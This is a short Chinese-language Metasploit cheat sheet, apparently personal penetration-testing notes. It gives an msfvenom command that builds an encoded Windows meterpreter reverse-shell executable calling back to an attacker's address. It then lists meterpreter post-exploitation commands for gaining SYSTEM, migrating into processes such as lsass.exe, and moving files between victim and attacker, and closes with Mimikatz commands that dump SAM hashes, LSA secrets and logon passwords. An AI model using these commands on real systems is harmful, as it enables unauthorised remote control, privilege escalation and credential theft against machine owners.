產 Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={PORT} -f exe -e x86/shikata_ga_nai > {FILE}
執行
- 記得 Payload 需要修改成相對應的
windows/meterpreter/reverse_tcp
常見指令
ls,pwd , mkdir, catgetuid
- 取得使用者名稱
edit {檔名}sysinfogetsystem- 如果有過 UAC 的話,有機率可以直接拿 system
- 執行後輸入
getuid 就可以確認自己是否真的是 system 了
psmigrate {PID}- 可以讓自己爬到 x64 之類的 system 權限上
- 例如 lsass.exe 的 PID
screenshotupload {檔案} / download {檔案}- upload -> attacker to victim
- download -> victim to attacker
Mimikatz
- 需要是 system 權限
load kiwihelp kiwilsa_dump_samlsa_dump_secretskiwi_cmd sekurlsa::logonpasswords